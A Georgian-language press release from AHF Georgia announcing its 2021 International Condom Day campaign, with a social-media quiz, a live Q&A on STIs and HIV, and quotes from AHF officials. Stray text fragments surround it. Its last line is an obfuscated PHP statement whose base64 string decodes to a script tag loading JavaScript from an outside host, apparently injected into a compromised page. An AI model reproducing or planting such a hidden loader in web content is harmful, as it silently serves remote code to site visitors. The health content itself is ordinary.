celsiusi
ავერსი შნაიდერი
შემოუერთდით კონდომის საერთაშორისო დღისადმი მიძღვნილ AHF-ის კამპანიას „ყოველთვის მოდაშია", რადგან აღნიშნული ღონისძიების მიზანია მთელ მსოფლიოში გაიზარდოს კონდომებზე ხელმისაწვდომობა, რაც ხელს შეუწყობს აივ ინფექციისა და სქესობრივი გზით გადამდები დაავადებების თავიდან აცილებას და  ცხოვრების ჯანსაღი წესის პოპულარიზაციას!
 
თბილისი, საქართველო (13 თებერვალი, 2021)  მსოფლიოში, COVID-19-ისპანდემიამ გავლენა მოახდინა ჩვენი ცხოვრების მრავალ ასპექტზე. მათ შორის, კონდომებზე ხელმისაწვდომობასა და აივ ინფექცია/შიდსზე ტესტირების შეუფერხებლად განხორციელებაზე. შიდსის ჯანდაცვის ფონდი (AHF), უმსხვილესი გლობალური ორგანიზაცია, გიწვევთ ჩაერთოთ კონდომის საერთაშორისო დღის (ICD) კამპანიის  „ყოველთვის მოდაშია" ფარგლებში მსოფლიო მასშტაბით გამართულ ღონისძიებებში, რათა ყველას შევახსენოთ, თუ რამდენად მნიშვნელოვანია მოსახლეობას ჰქონდეს წვდომა უფასო კონდომებზე, რაც საუკეთესო საშუალებაა სქესობრივი გზით გადამდები ინფექციების (სგგი), მათ შორის აივ ინფექციისგან თავის დასაცავად.
 
პანდემიისგან გამოწვეულმა დაბრკოლებებმა, კიდევ უფრო გამოკვეთა ადვოკატირების აუცილებლობა და მნიშვნელობა კონდომებზე ხელმისაწვდომობის პრიორიტეტად განსაზღვრისათვის. ახალგაზრდებმა კარგად უნდას გაითავისონ, რომ უსაფრთხო სქესობრივი კავშირი მნიშვნელოვანია, რათა დაიცვან საკუთარი სიცოცხლე, ჯანმრთელობა და შეამცირონ  აივ ინფექციისადასგგი-ს გავრცელება.
2008 წელს, AHF-მა დაიწყო კონდომის საერთაშორისო დღის (ICD) აღნიშვნა, რომლის მიზანსწარმოადგენდა კონდომების გამოყენების პოპულარიზაცია და ხელშეწყობა, რადგან კონდომი კვლავ ყველაზე ეფექტიანი საშუალებაა სგგი-ის და დაუგეგმავი ორსულობის თავიდან ასაცილებლად. ICD-ი ყოველწლიურად, გლობალური მასშტაბით, ვალენტინობის წინა დღეს, 13 თებერვალსაღინიშნება დაAHF წარმომადგენლობები,მსოფლიო მასშტაბით,მართავენ  საინტერესო ღონისძიებებს. 2021 წელს, კონდომის საერთაშორისო დღე სლოგანით „ყოველთვის მოდაშია" აღინიშნება.
 
2021 წელს, ICD-ს აღნიშვნას უერთდება AHF საქართველოც. COVID-19-ისპანდემიის გამო არსებული რეგულაციების გათვალისწინებით, კამპანია სოციალურ ქსელშიგანხორციელდება.  კამპანიის მიზანი უსაფრთხო სექსის და კონდომის, როგორც სქესობრივი გზით გადამდები დაავადებების თავიდან აცილების საუკეთესო საშუალების შესახებ საზოგადოების ცნობიერების ამაღლებაა.  AHF საქართველო-ს ფეისბუქ გვერდზე გაიმართება ვიქტორინა, რომლის გამარჯვებულები საჩუქრებს, მათ შორის კონდომებს მიიღებენ. 13 თებერვალს, 18:00 სთ-ზე, ფეისბუქისჯგუფის „მედ სითი“-ს ,,LIVE”-ში, სქესობრივი გზით გადამდებ დაავადებებზე, მათ შორის აივ ინფექცია/შიდსზე დამათი თავიდან აცილების გზებზე, მოსახლეობის შეკითხვებსAHF საქართველოს ხელმძღვანელი ნინო ხეთაგური უპასუხებს. 
 
„COVID-19-ის გამო არსებული შეზღუდვები, წარმოადგენს მიმდინარე საფრთხეს მოსახლეობის უფასო კონდომებზე ხელმისაწვდომობის კუთხით, განსაკუთრებით ისეთ ქვეყნებში,  სადაც მათი მარაგების არარსებობა და სხვა პრობლემები, ისედაც აფერხებს აღნიშნულ პროცესს“, - განაცხადა AHF-ის გლობალური პოლიტიკისა და ადვოკატირების მიმართულების ხელმძღვანელმა, ტერი ფორდმა.
 
,,AHFერთგული რჩება იმისა, რომ მსოფლიოს მასშტაბით ხალხისთვის ხელმისაწვდომი იყოს უფასო ან იაფი კონდომები. შესაბამისად, ICD-ს ჩვენ კამპანიებს „ყოველთვის მოდაშია" და „უსაფრთხო უფრო სექსუალურია", რომლებსაც  AHF-ის წარმომადგენლები მსოფლიოს მასშტაბით მართავენ, წარმოადგენს ერთ-ერთ გზას, კონდომებზე მოსახლეობის ხელმისაწვდომობის უზრუნველყოფისთვის. ჩვენ მოვუწოდებთ ყველას, 45 ქვეყანაში, სადაც ჩვენ ვსაქმიანობთ, ჩაერთონ გასართობ ღონისძიებებში და გაავრცელონ ინფორმაცია კონდომისა  და კონდომზე  ხელმისაწვდომობის მნიშვნელობაზე!"
 
„კონდომებზე ხელმისაწვდომობა ჩვენი ძირითადი პრიორიტეტია“, - აცხადებს AHF-ის პრეზიდენტი მაიკლ ვაინშტაინი.
 
„კონდომის საერთაშორისო დღე წარმოადგენს პლატფორმას, იმისთვის, რომ  მოვუწოდოთ მთავრობებსა და საზოგადოებრივი ჯანდაცვის ინსტიტუციებს, ადამიანებს უნდა ჰქონდეთ საკუთარი თავისა და ახლობლების დაცვის საშუალებები, რაც განსაკუთრებით მნიშვნელოვანია, მაშინ, როდესაც ყოველწლიურად, 1,7 მილიონ ახალი აივ ინფიცირების შემთხვევაა მსოფლიოში. ეს უბრალოდ დაუშვებელია, რადგან ჩვენ გვაქვს შესაძლებლობა კონდომები გავანაწილოთ მსოფლიოს მასშტაბით,  რათა  მოხდეს  დაავადებების თავიდან აცილება”.
 
AHF-ის კონდომის საერთაშორისო დღისადმი მიძღვნილი ღონისძიებების ჩამონათვალის სანახავად ეწვიეთ LOVEcondoms.org!
 
1587
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");